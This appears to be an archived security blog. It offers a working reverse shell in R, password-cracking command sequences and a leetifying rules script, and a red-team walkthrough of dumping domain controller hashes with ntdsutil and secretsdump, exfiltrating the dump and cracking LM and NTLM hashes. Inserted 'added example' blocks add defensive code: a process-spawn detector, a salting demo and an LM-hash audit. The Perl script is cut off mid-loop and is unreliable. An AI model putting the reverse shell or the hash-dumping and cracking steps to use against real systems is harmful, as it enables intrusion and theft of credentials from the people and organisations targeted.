Saturday, July 13, 2019

Reverse Shell in 'R'

By underwhelming popular demand, here's a reverse shell for the 'R' language. Change the IP address and port, and also the "cmd /c" prefix if you're not running on Windows.

I may have stolen this off someone, but I can't find it now; many apologies if so.

See also

client <- function(){
    con <- socketConnection(host="", port = 1234, blocking=TRUE, server=FALSE, open="r+")
    while (TRUE){
      # read one command line, run it through the shell, write the output back
      sendme <- readLines(con, n=1)
      output <- system(paste0("cmd /c ",sendme), TRUE)
      write_resp <- writeLines(output, con)
    }
}
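On the detection side (an added example, not code from the post), every command the loop above receives becomes a fresh cmd.exe whose parent is the R interpreter, so a process-creation feed gives a straightforward hunt: R spawning cmd.exe at all is unusual on most hosts, and a run of them from one parent PID is the shape of a command loop. The Sysmon-style records, install path, image names and PIDs below are constructed assumptions, not real telemetry.

```python
import ntpath
from collections import defaultdict

# Image names of the R interpreter on Windows (assumption: the binaries a standard R install ships)
R_IMAGES = {"r.exe", "rterm.exe", "rscript.exe", "rgui.exe"}

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"UtcTime": "2019-07-13 10:00:01", "ParentProcessId": 4242,
     "ParentImage": r"C:\Program Files\R\R-x.y.z\bin\x64\Rscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
    {"UtcTime": "2019-07-13 10:00:04", "ParentProcessId": 4242,
     "ParentImage": r"C:\Program Files\R\R-x.y.z\bin\x64\Rscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c type data.csv"},
    {"UtcTime": "2019-07-13 10:00:09", "ParentProcessId": 4242,
     "ParentImage": r"C:\Program Files\R\R-x.y.z\bin\x64\Rscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c echo done"},
    {"UtcTime": "2019-07-13 10:05:00", "ParentProcessId": 5151,
     "ParentImage": r"C:\Program Files\R\R-x.y.z\bin\x64\Rterm.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
    {"UtcTime": "2019-07-13 10:06:00", "ParentProcessId": 6060,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c echo hello"},
]


def is_r_spawned_cmd(event):
    """True when an R interpreter is the parent of a cmd.exe child, which is
    exactly what R's system("cmd /c ...") produces on Windows."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    return parent in R_IMAGES and child == "cmd.exe"


def flag_events(events):
    """All process-creation records matching the R -> cmd.exe parent/child pair."""
    return [e for e in events if is_r_spawned_cmd(e)]


def noisy_parents(events, threshold=3):
    """Parent PIDs that spawned cmd.exe at least `threshold` times. One cmd.exe
    per received command is the signature of the loop; a single spawn may just
    be a script calling out to the shell once."""
    counts = defaultdict(int)
    for e in flag_events(events):
        counts[e["ParentProcessId"]] += 1
    return {pid for pid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for e in flag_events(SAMPLE_EVENTS):
        print(e["UtcTime"], e["ParentProcessId"], e["CommandLine"])
    print("repeated spawners:", noisy_parents(SAMPLE_EVENTS))
```

The threshold is the tuning knob: analysts' scripts that shell out once will match is_r_spawned_cmd, so alert on noisy_parents and keep the single hits as context.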

Saturday, September 15, 2018

More on password cracking

Some more ideas for password cracking once you've already run the usual dictionary + rules attacks.

The lastN (or lastN-M) files are lists of common suffixes of that length, taken from a breach compilation.

The l33tXXX.rule files are leetified rules; see the perl script after the bash script:


# no inc as we've done it already
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -r rules/nsav2dive.rule

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top95Thousand-probable.txt -r rules/l33test.rule

# troy hunt and other breaches..
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/breachcompilation.txt -r rules/nsav2dive.rule

# dumb stuff
# python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/default.hcmask

python3 -i ../32hex.txt -t md5 -d nb --noinc -e /root/dict/last1-4.txt

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/ucth.txt -r rules/nsav2dive.rule

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top2Billion_probable.txt -r rules/l33t64.rule

python3 -i ../32hex.txt -t md5 -d /root/dict/first1-4.txt -e nb

# suffixes...
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top95Thousand-probable.txt -e /root/dict/last1-4.txt

# python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -e /root/dict/last3.txt

# python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -e /root/dict/last4.txt

# previously found and phrases
python3 -i ../32hex.txt -t md5 -d nb --noinc -r rules/l33test.rule

python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/hashcat.hcmask

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r rules/best64.rule  --noinc

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r hashcat-4.0.1/rules/InsidePro-PasswordsPro.rule  --noinc

python3 -i ../32hex.txt -t md5 -d /root/dict/crackstation.txt --noinc

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top258Million-probable.txt -e /root/dict/last3.txt

# PACK - password policy mask
# python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/ntlm.hcmask

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r rules/nsav2dive.rule  --noinc

The perl script below takes an existing rules file and leetifies it:

# leetifies existing rules

while ($line=<STDIN>) {
    chomp($line);

    # skip blank lines and comments
    if ($line=~m/\S/ && $line!~m/^#/) {
        # don't do repeat substitutions on rules that already swap a leetable letter
        if ($line!~m/s[oOaAeEiIsS]/) {
            print $a;

# usage - might need to dos2unix the source rules first

# perl rules/ < rules/nsav2dive.rule | awk '!x[$0]++' > l33tnsa.rule

# perl rules/ < d3adhob0.rule.txt | awk '!x[$0]++' > deadleethobo.rule

# perl rules/ < rules/InsidePro-PasswordsPro.rule | awk '!x[$0]++' > l33tpasspro.rule

# cat rules/nsav2dive.rule d3adhob0.rule.txt |  perl rules/ | awk '!x[$0]++' > l33test.rule

# perl rules/ < rules/best64.rule | awk '!x[$0]++' > l33t64.rule

# etc. 

Monday, August 27, 2018

Further password cracking - beyond dict + rules

This works quite well for me when I've exhausted the usual approaches.

Update: the OMEN runs have been finding most passwords. You have the slightly thorny problem of training it on "representative" data, but that is another blog post.


You'll need aspell and its dictionaries installed too (apt install aspell-* on Debian).


Get prince:

Working out rules and dict from passwords

Here, the existing passwords we've cracked from the dump are in /root/n3. Use hashcat --show | cut -f 2 -d':' > /root/n3 to get the raw passwords, then run:

-b n3 /root/n3

[ this generates n3.rule, n3.word ]

PRINCE - combinations of words

princeprocessor-0.22/pp64.exe < n3.word -l 100000 --pw-min=12 | head -100000 > n3.prince

[generates candidate passwords of length >= 12 by combining existing words ]

hashcat64.exe -a0 -m 1000 n1 n3.prince -r n3.rule  --loopback  -O

OMEN - probabilistic generation

OMEN/createNG.exe --iPwdList=n3.word

[train our model on n3.word]

OMEN/enumNG.exe -m 100000 -p > n3.omen

[generate a list of candidate passwords]

hashcat64.exe -a0 -m 1000 n1 n3.omen -r n3.rule  --loopback  -O

Wednesday, July 25, 2018

New Password Cracking Tool 'hashcrack'

Low-key launch, as I'm not sure I have squashed all the bugs at this point; I imagine other people will have different use cases from mine, and some other bugs will come to light.


This will download 30Gb of dictionaries, by the way; if you don't want to do this, configure your own in the hashcrack.cfg file and remove the step from

git clone
cd hashcrack
python3 hashcrack -i targethashes.txt

The hashcrack program tries to pick some sensible defaults for you and runs hashcat against your wordlist, but if it's not getting anything for you, try the following:

Try phrases, dictionary words and previously found words. The latter will get them from your pot file, which is useful for trying found passwords against different hash types:

$ python3 -i sha512hashes.txt --phrases --words --found

Try existing dictionaries with common suffixes:

$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt -e dict\last3.txt
$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt -e dict\last4.txt

If you spot patterns, try and use them, e.g. digits followed by something more complex:

$ python3 -i sha512hashes.txt -d dict\last3.txt --lmask ?d?d?d?d?d?d

or something complex followed by digits:

$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt --rmask ?d?d?d?d?d?d

or use a crib file of found passwords or guesses (keep it short though). This will generate variants of the crib in one pass (leet2 rules) and then use the resulting file to attack using more rules.

$ cat crib.txt

$ python3 -i sha512hashes.txt --crib dict/crib.txt

PRINCE preprocessor

If you're still not getting anything sensible, try hashcat's PRINCE preprocessor. It does some statistical magic to generate new combinations of words from a given wordlist, and may be worth a go:

Get it here:

$ ./princeprocessor/pp64.bin /root/dict/Top95Thousand-probable.txt --pw-min=9 --case-permute -l 1000000000 > /root/dict/prince.txt

$ python3 -i ../128hex -d /root/dict/prince.txt

Sunday, June 17, 2018

Salts in Passwords

This one is inspired by a comment I read on twitter; essentially someone said that you should use a salt in your password hashes, which is obviously true. However, it could have been fleshed out a little more than the 280-character limit allows.

Let's take a look at what a salt is:

$ openssl passwd -1 password

I've bolded the salt here - using md5crypt because the actual hash doesn't matter too much and this at least fits on one screen. These days, sha512crypt, bcrypt or something even better is to be preferred.

Above we have hash type, salt and the actual hash, separated by "$" characters. So, why do we have the salt? 

Essentially, if I can get hold of your password hashes and there's no salt, I can try every single password guess against the whole list of users at once: it's just as fast to crack 1,000 passwords as one password. Salting also makes it computationally infeasible to precompute a mapping from password to hash, because every distinct salt value multiplies the size of that table, and we can make it completely silly.

So - your salt should be cryptographically random and long enough (8 base64 chars here I think, so 48 bits worth).  This means when I'm cracking, I have to perform a computation per individual hash, and not one for the whole lot like I can with plain SHA1 or NTLM. 
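To make the cost argument concrete, here is an added example (not code from the post) that runs the same small wordlist against an unsalted store and a per-user-salted store and counts the hash computations each needs. It also parses the $id$salt$hash layout shown above and checks the 8-chars-equals-48-bits arithmetic. SHA-1 stands in for the unsalted case (as with the SHA1/NTLM mentioned), and SHA-256 over salt||password stands in for the salted case purely to show the per-salt work; the user names, passwords and wordlist are constructed, and sha512crypt or bcrypt are what you would actually deploy.

```python
import hashlib
import secrets


def parse_crypt_string(s):
    """Split a modular-crypt string such as $1$salt$hash into its three fields."""
    parts = s.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("expected $id$salt$hash")
    return {"id": parts[1], "salt": parts[2], "hash": parts[3]}


def salt_bits(salt):
    """crypt(3) salts use a 64-character alphabet, so each character carries 6 bits."""
    return 6 * len(salt)


def new_salt(nbytes=6):
    """Cryptographically random salt; 6 bytes encode to 8 base64 characters (48 bits)."""
    return secrets.token_urlsafe(nbytes)


def unsalted_hash(password):
    # Stand-in for an unsalted scheme like plain SHA1 or NTLM.
    return hashlib.sha1(password.encode()).hexdigest()


def salted_hash(password, salt):
    # Illustrative only: a real system uses a slow, purpose-built scheme (sha512crypt, bcrypt, ...).
    return hashlib.sha256((salt + password).encode()).hexdigest()


def crack_unsalted(stored, wordlist):
    """stored: {user: hash}. Each guess is hashed once and checked against every user."""
    work = 0
    table = {}
    for guess in wordlist:
        table[unsalted_hash(guess)] = guess
        work += 1
    cracked = {user: table[h] for user, h in stored.items() if h in table}
    return cracked, work


def crack_salted(stored, wordlist):
    """stored: {user: (salt, hash)}. Every guess must be re-hashed under every user's salt."""
    work = 0
    cracked = {}
    for user, (salt, h) in stored.items():
        for guess in wordlist:
            work += 1
            if salted_hash(guess, salt) == h:
                cracked[user] = guess
                break
    return cracked, work


def demo():
    # Constructed users and wordlist; two users share a password, one is not in the list.
    passwords = {"alice": "password", "bob": "password", "carol": "correct horse"}
    wordlist = ["123456", "password", "letmein"]
    unsalted = {u: unsalted_hash(p) for u, p in passwords.items()}
    salted = {}
    for u, p in passwords.items():
        s = new_salt()
        salted[u] = (s, salted_hash(p, s))
    cracked_u, work_u = crack_unsalted(unsalted, wordlist)
    cracked_s, work_s = crack_salted(salted, wordlist)
    return {
        # unsalted: identical passwords give identical hashes, visible before any cracking
        "same_password_visible_unsalted": unsalted["alice"] == unsalted["bob"],
        "same_password_visible_salted": salted["alice"][1] == salted["bob"][1],
        "cracked_unsalted": cracked_u, "work_unsalted": work_u,
        "cracked_salted": cracked_s, "work_salted": work_s,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Both stores give up the two weak passwords, but the unsalted one costs three hash computations for all three users, while the salted one costs seven for the same wordlist, and that factor grows with the number of users rather than staying flat.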

Monday, May 28, 2018

Cracking domain password hashes

I don't do a lot of red-teaming, but when I do, I try to tread lightly. This is for two reasons: I'm lazy, and I don't like getting phoned up by irate admins if a DC goes down.

I tend to use ntdsutil to dump hashes as soon as I get domain admin, as described here: 

This is a Microsoft tool and I've never had it break a DC, whereas I have seen some of the other methods take down a domain controller.

At this point you have a zip file, which you exfiltrate to your laptop.

Using impacket's secretsdump tool, you can then extract the users:

python impacket/examples/ -system Temp\SYSTEM  -ntds Temp\ntds.dit LOCAL -outputfile ifm.ntds

Use -user-status if you want to only show active accounts, and then grep for these.

Grab the allcase.rule file from here:

You may be lucky and find that some of the LM hashes are present, which makes your job that much easier.
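From the defender's side, this is a condition worth auditing for before anyone else finds it. Here is an added example (not from the post, and not part of impacket) that reads the DOMAIN\user:RID:LM:NT::: lines secretsdump writes, reports accounts whose LM hash is actually stored rather than the empty-string placeholder, and groups accounts that share an NT hash (NTLM is unsalted, so equal hashes mean equal passwords). The sample dump, domain, account names and hash values are constructed placeholders; the trailing "(status=...)" suffix is assumed to be what -user-status appends.

```python
# LM hash of the empty string: what a domain stores when LM hashing is disabled (the modern default)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

SAMPLE_DUMP = """\
# constructed sample of secretsdump's .ntds output with -user-status; hashes are placeholders, not real
corp.example\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
corp.example\\legacysvc:1105:00112233445566778899aabbccddeeff:fedcba9876543210fedcba9876543210::: (status=Enabled)
corp.example\\jsmith:1203:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
corp.example\\oldtemp:1311:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: (status=Disabled)
"""


def parse_line(line):
    """Parse one DOMAIN\\user:RID:LMhash:NThash::: line; returns None for blanks and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    status = None
    if " (status=" in line:  # assumption: -user-status appends " (status=Enabled|Disabled)"
        line, _, tail = line.rpartition(" (status=")
        status = tail.rstrip(")")
    parts = line.split(":")
    if len(parts) < 4:
        return None
    account, rid, lm, nt = parts[:4]
    return {"account": account, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(), "status": status}


def parse_dump(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def accounts_with_lm(records, enabled_only=True):
    """Accounts whose LM hash is really stored: two 7-character case-folded halves,
    which is why the post can exhaust them with a ?a x7 mask."""
    return [r["account"] for r in records
            if r["lm"] != EMPTY_LM and (not enabled_only or r["status"] != "Disabled")]


def shared_nt_hashes(records):
    """Group accounts by NT hash; any group larger than one is a shared password."""
    groups = {}
    for r in records:
        groups.setdefault(r["nt"], []).append(r["account"])
    return {h: accts for h, accts in groups.items() if len(accts) > 1}


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    print("LM hash stored:", accounts_with_lm(recs))
    for h, accts in shared_nt_hashes(recs).items():
        print("shared password:", ", ".join(accts))
```

Any account that comes back from accounts_with_lm needs a password change with LM storage disabled, and the shared-hash groups are the ones to chase first regardless of what cracks.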

Crack the LM hashes first with the following, which tries all 7-character combinations:

hashcat64.exe -m 3000 ifm.ntds -a3 ?a?a?a?a?a?a?a

Then take the output you've got from this and feed it into your NTLM crack as a crib, because we know the NTLM password will be the same but with different case.

hashcat64.exe -m 1000 -a0 ifm.ntds lmoutput.txt -r allcase.rule

Now, you can go ahead and do the normal cracking - grab dictionaries here if you want:


hashcat64.exe -m 1000 -a0 ifm.ntds Top258Million.txt -r nsav2dive.rule

Of course, you might want to tweak this depending on the password policy.